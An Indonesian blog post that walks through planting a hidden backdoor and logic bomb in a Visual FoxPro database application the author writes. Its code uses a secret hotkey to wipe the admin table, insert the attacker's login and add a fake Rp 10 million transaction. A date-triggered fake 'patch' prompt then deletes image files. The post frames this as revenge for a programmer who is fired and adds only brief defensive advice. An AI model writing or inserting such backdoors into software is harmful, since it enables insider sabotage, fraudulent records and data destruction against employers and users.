Searching...
Senin, 21 Februari 2011

Hacking Database Visual Foxpro

Mungkin judul diatas kelihatan serem, tapi sebenarnya ini Cuma bualan saya aja biar dikira hebat. Maklum baru belajar. Artikel ini merupakan kejahilan dari saya sendiri dan apabila ini menjadikan ide untuk berbuat jahat, saya lepas tangan. 
Visual foxpro merupakan sebuah software untuk membuat suatu program
aplikasi database. Penggunaan nya yang relatif gampang menjadikan  banyak dipakai. Dalam hal ini saya akan memberikan kelebihan dari foxpro yaitu pemanfaatan akses tombol yang berbahaya bagi tangan orang jahil, walaupun program tersebut sudah dalam bentuk program aplikasi program tersebut masih dapat diubah. Yang perlu digaris bawahi adalah program ini dibuat oleh sobat sendiri. Kenapa? Karena kita harus tahu nama tabel, field dan tipe data yang dipakai. Jadi script yang akan dibuat ditambahkan pada program yang dibuat. Untuk percobaan, kita akan mencoba membuat suatu project sendiri. Project ini saya beri nama balihack dan dilengkapi dengan 3 buah tabel yaitu admin, hari dan transaksi. Tabel tsb jg dilengkapi dengan field fieldnya. Seperti pada gambar dibawah.


Setelah itu kita akan membuat satu buah form login. Akan dilihat seperti gambar dibawah ini.

Form ini merupakan form login untuk operator dari program yang kita buat.
Form ini biasanya muncul sebelum menu utama muncul. Liat script yag telah
dibuat :
*---- inti dari program---program ini ditempatkan di form admin tersebut, di procedure KeyPress
*---- dengan menekan SHIPT+HOME maka semua eksekusi akan dijalankan.  Program akan memanggil
*---- tabel admin, set safety off untuk mematikan keamanan ferifikasi dari foxpro dan isi dari tabel admin
*---- akan dihapus. Secara otomatis user akan ditambah dengan nama capil dan password balihack
LPARAMETERS nKeyCode, nShiftAltCtrl
ON KEY LABEL CTRL+HOME SELECT admin
SET SAFETY OFF
ZAP
INSERT INTO ADMIN(nama_log,pass) VALUE ("capil","balihack")
*---- ini merupakan program untuk melakukan auto increment pada field nomor transaksi
*---- jd gak terlalu penting, hanya untuk menghilangkan kecurigaan dari operator atau auditor jika
*---- jika memang ditempat sobat bekerja ada autitnya. Agar transaksi tercatat sesuai dengan no
*---- selanjutnya
SELECT transaksi
GO bottom
akhir= SUBSTR(no_tran,2,4)
akhir=VAL(akhir)
iF akhir == 0 then
nomornya = 'A0001'
ENDIF
IF akhir<9 AND akhir>=0
nomornya = 'A000'+ALLTRIM(STR(akhir+1))
ENDIF
IF akhir<99 AND akhir>=9
nomornya = 'A00'+ALLTRIM(STR(akhir+1))
ENDIF

IF akhir<999 AND akhir>=99
nomornya = 'A0'+ALLTRIM(STR(akhir+1))
ENDIF
IF akhir<9999 AND akhir>=999
nomornya = 'A'+ALLTRIM(STR(akhir+1))
ENDIF
*---- program akan memanggil tabel transaksi, semua field akan diisi sesuai dengan keinginan kita
*---- dalam contoh ini no_tran akan diisi sesuai dengan aslinya dng mengmbl nilai nomornya, nama capil
*---- dan saldo 10000000
SELECT transaksi
INSERT INTO transaksi(no_tran,pelanggan,saldo) VALUE
(nomornya,"capil","10000000")
*---- Pencatat penghancuran selanjutnya akan dicatat
*---- dengan sedikit logika maka kita akan membuat suatu pencatatan waktu yang berlaku pada saat ini.
*---- waktu tersebut akan disimpan di tabel hari
SELECT hari
INSERT INTO hari(tgl) VALUE (DATE())
Mari kita lihat hasil program kita, jalankan program kemudian tekan
SHIFT+HOME secara bersamaan. Apa yang terjadi, mari kita lihat gambar di
bawah ini :

-----sebelum penekanan SHIFT+HOME ----


-----sesudah penekanan SHIFT+HOME ----


Setelah itu mari kita penghancuran yang kedua. Lihat script dibawah ini :
*---- pertama program akan melihat isi tabel hari dan tanggal yang sekarang akan dicatat
*---- script ini ditempatkan di procedure INIT
*---- disinilah pentingnya kita menyimpan hari pada script diatas, secara otomatis program akan akan
*---- melakukan ceking apakah tanggal tersebut berbeda. Program ini akan bekerja keesokan harinya
*---- saat program dihidupkan pertama kali
*---- kita lanjutkan, jika tanggal yang sekarang lebih besar dari tanggal yang disimpan ditabel maka
*---- akan menampilkan pesan untuk memperbaiki program dan user diperintahkan untuk melakukan patch
*---- C:\WINDOWS\PATCH.ZIP, dan jika operator menekan YES maka kita patut bersyukur
*---- sebenarnya itu adalah social enginering untuk mengarahkan operator
*---- membuka program patch.zip yang telah kita simpan jauh2 hari sebelum program yang kita buat
*---- dioperasikan. Misalnya pada patch.zip itu kita isi virus gmn ya? Jahat sekali.
*---- script ini akan menghapus semua file berektension .JPG dan .GIF di folder tempat kita menyimpan
*---- aplikasi ini, sehingga apabila program itu menggunakan gambar2 yang berektension ter
*---- sebut akan terhapus. Kejam?
SELECT hari
n=DATE()
IF tgl<n
a=MESSAGEBOX("Untuk memperbaiki program, lakukan patch di folder
C:\WINDOWS\PATCH.ZIP" ,4,"Error Program")
DO case
CASE a=6
SET SAFETY OFF
x=GETDIR("","Pilih directory patch : ")
IF !EMPTY(x) THEN
CLOSE ALL
DELETE FILE "*.JPG"
DELETE FILE "*.GIF"
ENDIF
MESSAGEBOX("Patch program berhasil
dilakukan",64,"Sukses")
SET SAFETY ON
CASE a=7
MESSAGEBOX("patch belum dilakukan",64,"Batal")
RETURN
endcase
endif
Semakin halus cara kerja kita semakin bagus. Misal kita lihat diatas semua nama user dan password kita  hapus dan mengganti nama user dan password, tentu itu akan membuat curiga operator karena gak bisa login. Cara yang lebih halus yaitu membiarkan semua login seperti semula tetapi kita akan membuat suatu login dengan nama dan password yang kosong sehingga setiap orang yang tidak tau password pun dapat login. Ya, jika yang login itu baik, gimana jika jahat? Pada transaksi kita sudah menambah satu buah transaksi dengan nilai saldo Rp. 10.000.000 (nilai yang cukup banyak buat anak kos). Mungkin sedikit bagi perusahaan,  gimana kalau kita ganti dengan nilai yang lebih besar misal Rp.100juta. saya yakin untuk beberapa saat  keringat mereka akan mengucur deras karena terjadi kesalahan pembukuan. Memang tidak dapat dipungkiri ada beberapa programer usil yang bekerja pada perusahaan atau instansi tertentu yg menggunakan cara ini.  Kenapa mereka melakukan itu, mungkin alasan yang paling mendasar adalah balas dendam. Mereka takut bila suatu saat mereka dipecat, mereka tidak bisa memberi oleh oleh yg layak untuk perusahaan tsb,misal dng penghapusan transaksi atau menformat komputer mereka hanya dengan menekan beberapa tombol. Sambil
bernyanyi programer yang dipecat akan kemeja operator dan menghidupkan komputer tsb. Dengan 2 tombol maka BOOM....BOOM...

“BERANI PECAT, AKU PERKOSA DATA KALIAN”
Mungkin itu MOTTO mereka, saya yakin sobat tidak mau melakukan hal tersebut karena pekerjaan itu tidak ada baiknya. Saran saya untuk hal ini adalah sebelum program resmi dipakai sebaiknya cek dulu listing  program tersebut dan backup selalu data sobat tidak hanya pada satu tempat. Ini hanya sedikit ide dari  saya. Silahkan dikembangkan untuk kebaikan. Sebenarnya program ini mau ditambahkan sekaligus  perubahan registry biar agak sedikit keren.

0 comments:

Posting Komentar

Like & Share :


Mari budayakan berkomentar baik berupa Kritik, Saran, maupun Pertanyaan untuk menjadikan blog ini lebih baik ke depannya. Copy-Paste di ijinkan, tapi URL sumbernya disertakan.
Terima Kasih.

 
Back to top!